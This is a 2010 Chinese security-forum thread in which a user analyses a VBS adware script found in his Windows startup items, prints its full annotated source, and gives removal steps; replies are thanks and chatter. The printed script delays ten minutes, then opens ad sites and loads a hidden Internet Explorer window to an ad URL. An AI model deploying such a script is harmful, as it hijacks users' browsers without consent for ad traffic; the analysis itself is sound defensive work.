论坛 › 『 病毒分析 』 › 自动弹出网页的恶意脚本分析

riusksk 发表于 2010-3-2 00:47:08

自动弹出网页的恶意脚本分析

by:riusksk
blog:http://riusksk.blogbus.com

这几天在开机后，都会自动弹出一个广告网站，在注册表中搜索弹出的网页，无果而返，接着再看了一下启动项，发现个VBS脚本文件，如下图：

找到这个脚本文件后，用记事本打开，代码如下：

00000: On Error Resume Next
00001: Dim Fso,wss,HKRegStr
00002: Set Fso= CreateObject("Scripting.FileSystemObject")
00003: Set wss=CreateObject("WScript.Shell")
00004: HKRegStr=wss.RegRead("HKEY_CURRENT_USER\Software\Maxthon2\Folder")
00005: if HKRegStr<>"" then
00006: HKRegStr=HKRegStr+"\Maxthon.exe"     '默认使用傲游浏览器打开网站
00007: if (Fso.FileExists(HKRegStr)) then
00008: wscript.sleep 600000        '脚本运行10分钟之后再打开网站
00009: '网址之家.url是一个快捷方式文件，指向http://www.so02.cn/?sid=1，如下图所示：

00010: CreateObject("WScript.Shell").run """" & HKRegStr &""" C:\Windows\system32\网址之家.url",x,ture   
00011: set ie=WScript.createobject("internetexplorer.application")
00012: ie.visible = 0
00013: ie.navigate "http://qw.ad29.com/ji.asp"                '接着再打开这个网址
00014: wscript.sleep 10000        '暂时10秒
00015: ie.quit
00016: else
00017: '假如没有注册表中指定的Maxthon.exe，则用默认浏览器打开网址之家.url，也就是http://www.so02.cn/?sid=1
00018: wscript.sleep 600000
00019: CreateObject("WScript.Shell").run" C:\Windows\system32\网址之家.url",x,ture       
00020: end if
00021: else
00022: '假如注册表HKEY_CURRENT_USER\Software\Maxthon2\Folder无键值，则10分钟后打开网址之家.url
00023: wscript.sleep 600000
00024: CreateObject("WScript.Shell").run "C:\Windows\system32\网址之家.url" ,x,ture
00025: end if

清除方法：去掉启动项中的网址之家.vbs并将其删除，再将 C:\Windows\system32\网址之家.url 也清除，重启之后搞定。

jerrynpc 发表于 2010-3-2 02:04:09

每次都能坐泉哥的大...打我PG我不乖...。O(∩_∩)O哈哈~

gkulm1775 发表于 2010-3-2 02:40:41

支持楼主

creekcn 发表于 2010-3-2 03:30:18

学习了 谢谢

娃娃鱼 发表于 2010-3-2 09:46:48

这个方法是很不错！学习了！

kelvar 发表于 2010-3-2 10:21:42

前段时间被这东西这么了很长时间。总是莫名的修改主页。悄悄的修改，真是让人郁闷。多谢LZ分享

中专学历 发表于 2010-3-2 10:54:09

学习了 谢谢:D:

riusksk 发表于 2010-3-2 12:58:28

本帖最后由 riusksk 于 2010-3-2 13:47 编辑

每次都能坐泉哥的大...打我PG我不乖...。O(∩_∩)O哈哈~
jerrynpc 发表于 2010-3-2 02:04 http://unpack.cn/images/common/back.gif


    两点起来占...打我PG我不乖...，你也太有才了吧
一时没注意，你也有10UF，恭喜早日升官发财:lol

ldlsgd 发表于 2010-3-2 13:15:28

学习一下！

jerrynpc 发表于 2010-3-2 15:50:25

两点起来占...打我PG我不乖...，你也太有才了吧
一时没注意，你也有10UF，恭喜早日升官发财
riusksk 发表于 2010-3-2 12:58 http://www.unpack.cn/images/common/back.gif


    谢谢泉哥，今天心情不错。暂时不鄙视你了。
一个vbs还搞这么复杂干啥啊

riusksk 发表于 2010-3-2 16:53:13

谢谢泉哥，今天心情不错。暂时不鄙视你了。
一个vbs还搞这么复杂干啥啊
jerrynpc 发表于 2010-3-2 15:50 http://unpack.cn/images/common/back.gif


    记录一下，顺便更新博客嘛:lol

少马石 发表于 2010-3-3 07:53:53

学习一下。。

fly 发表于 2010-3-5 17:03:48

标题：自动弹出网页的恶意脚本分析
链接：http://www.unpack.cn/viewthread.php?tid=46572
贴者：riusksk
日期: 2010-3-2 00:47

john 发表于 2010-3-5 20:27:52

这类恶意改首页的，真是千奇百怪，
什么样的方式都有啊。
急需要一个救世主。来拯救广大网友了。。

riusksk 发表于 2010-3-5 20:35:21

也不知道这脚本是浏览哪个网站中标的，安装个HIPS，觉得还是有必要的，不然有些杀软有昨根本派不上用场，用HIPS还可以查看日志，任何文件，注册表操作……都会记录的，容易查出病毒木马，只不过得自己手杀，呵呵

查看完整版本: 自动弹出网页的恶意脚本分析